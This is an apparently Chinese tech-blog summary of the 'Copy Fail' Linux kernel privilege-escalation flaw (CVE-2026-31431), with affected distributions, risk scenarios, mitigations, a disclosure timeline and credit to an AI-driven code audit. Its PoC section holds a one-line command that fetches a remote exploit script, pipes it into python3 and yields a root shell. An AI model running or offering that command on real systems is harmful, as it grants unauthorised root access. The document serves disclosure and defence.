732字节通杀Linux:史诗级漏洞潜伏近十年
🚨 史诗级漏洞:732 字节通杀所有 Linux,近十年潜伏
一个名为“Copy Fail”的 Linux 内核漏洞(CVE-2026-31431)被公开披露:
- 732 字节的 Python 脚本
- 100% 可靠,无需竞态窗口或内核偏移
- 影响所有 Linux 发行版(2017 年至今)
- 容器逃逸原语,跨租户攻击
- 近十年潜伏,直到 2026 年 4 月 29 日公开
同一个脚本在Ubuntu、RHEL、Amazon Linux、SUSE上都有效——无需修改。
🎯 漏洞核心
单一逻辑缺陷
Copy Fail 是一个直线逻辑缺陷:
- 不需要竞态窗口:不像大多数 Linux LPE 需要竞态
- 不需要内核偏移:不需要内核特定的偏移量
- 100% 可靠:每次都成功
- 同一个脚本:在所有发行版上都有效
漏洞链
Copy Fail 的攻击链:
- authencesn 逻辑错误:一个逻辑 bug
- AF_ALG:通过内核 crypto API
- splice():链式调用
- 4 字节 page-cache 写入:最终攻击原语
- 近十年可利用:从 2017 年到补丁发布
📊 受影响范围
官方验证的发行版
| 发行版 | 内核版本 | 状态 |
|---|---|---|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws | ✅ 已验证 |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 | ✅ 已验证 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 | ✅ 已验证 |
| SUSE 16 | 6.12.0-160000.9-default | ✅ 已验证 |
其他受影响发行版
以下发行版同样受影响:
- Debian
- Arch Linux
- Fedora
- Rocky Linux
- AlmaLinux
- Oracle Linux
- 嵌入式 Linux
结论:如果你的内核在 2017 年到补丁之间构建——你受影响。
💡 高危场景
| 场景 | 风险 | 影响 |
|---|---|---|
| 多租户 Linux 主机 | 高 | 任何用户变成 root |
| Kubernetes / 容器集群 | 高 | 跨容器、跨租户攻击 |
| CI Runner / Build Farm | 高 | PR 变成 runner 的 root |
| Cloud SaaS 运行用户代码 | 高 | 租户变成 host root |
| 标准 Linux 服务器 | 中 | 内部 LPE,可链式攻击 |
| 单用户笔记本 | 低 | 后渗透提权步骤 |
🔧 缓解措施
方案 1:更新内核(推荐)
更新内核到包含mainline commit a664bf3d603d的版本:
- 修复内容:撤销 2017 年的 algif_aead in-place 优化
- 效果:page-cache 页面不再出现在可写 destination scatterlist
- 状态:大多数主流发行版已发布补丁
方案 2:禁用 algif_aead 模块(临时)
# 禁用 algif_aead 模块 echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true
禁用 algif_aead 的影响
| 组件 | 影响 |
|---|---|
| dm-crypt / LUKS | 不影响 |
| kTLS / IPsec | 不影响 |
| OpenSSL / SSH | 不影响 |
| AF_ALG 用户空间 | 可能影响 |
结论:对大多数系统,禁用 algif_aead没有明显影响。
方案 3:seccomp 阻止 AF_ALG
对于不受信任的工作负载(容器、沙箱、CI),通过 seccomp 阻止 AF_ALG socket 创建:
# 检查 AF_ALG 使用 lsof | grep AF_ALG ss -xa
🚀 PoC 演示
漏洞 PoC 已公开,供 defenders 验证系统:
快速运行
$ curl https://copy.fail/exp | python3 && su # id uid=0(root) gid=1002(user) groups=1002(user)
PoC 详情
- 文件大小:732 字节
- 语言:Python 3.10+ stdlib only(os, socket, zlib)
- 默认目标:/usr/bin/su
- SHA256:a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
警告:脚本修改 setuid binary 的 page cache;更改重启后不持久,但 root shell 是真实的。不要在生产环境运行。
📅 披露时间线
| 日期 | 事件 |
|---|---|
| 2026-03-23 | 报告给 Linux kernel security team |
| 2026-03-24 | 初始确认 |
| 2026-03-25 | 补丁提议和审核 |
| 2026-04-01 | 补丁提交到 mainline |
| 2026-04-22 | CVE-2026-31431 分配 |
| 2026-04-29 | 公开披露 |
🔍 发现者:Xint Code
漏洞由Xint Code发现:
- 扫描时间:约 1 小时扫描 Linux crypto/ subsystem
- 发现方式:AI 驱动的代码审计
- 完整分析:root cause、diagrams、operator prompt
- 其他发现:同时发现其他高严重性漏洞,仍在协调披露中
Xint Code 战绩
- 0-day RCE:ZeroDay Cloud,扫荡数据库类别(Redis、PostgreSQL、MariaDB)
- DARPA AIxCC Top 3:DARPA AI Cyber Challenge 决赛
- DEF CON CTF 9×:DEF CON CTF 历史最获胜团队
📝 总结
Copy Fail(CVE-2026-31431)是史诗级 Linux 内核漏洞:
- 732 字节通杀所有 Linux(2017 年至今)
- 100% 可靠,单一逻辑缺陷
- 容器逃逸,跨租户攻击
- 近十年潜伏,直到 2026 年 4 月 29 日公开
- 高危场景:多租户主机、容器集群、CI Runner、SaaS
- 缓解:更新内核或禁用 algif_aead
- 发现者:Xint Code,AI 驱动代码审计
近十年的史诗级漏洞,一个脚本通杀所有 Linux。
漏洞官网:https://copy.fail
GitHub PoC:https://github.com/theori-io/copy-fail-CVE-2026-31431
技术分析:https://xint.io/blog/copy-fail-linux-distributions
Kernel 补丁:https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5
itadol5j
暂无介绍....
延伸阅读:
732字节通杀Linux:史诗级漏洞潜伏近十年
🚨 史诗级漏洞:732 字节通杀所有 Linux,近十年潜伏一个名为"Copy Fail"的 Linux 内核漏洞(CV...
732字节通杀Linux:史诗级漏洞潜伏近十年
🚨 史诗级漏洞:732 字节通杀所有 Linux,近十年潜伏一个名为"Copy Fail"的 Linux 内核漏洞(CV...
中国AI历史性突破:5家公司跻身全球十强
🏆 中国 AI 跻身全球十强:阿里、字节、智谱历史性突破权威第三方评测机构Artificial Analysis发布最新...
DeepSeek V4登顶:开源免费,击败顶尖对手
🏆 DeepSeek V4:迄今为止最伟大的 AI 模型深度求索(DeepSeek)发布了DeepSeek V4——一个...
OpenClaw双版本更新:图片生成改进+安全修复
🚀 OpenClaw 2026.4.21 更新:图片生成改进 + 多项安全修复OpenClaw 于4月22日发布了202...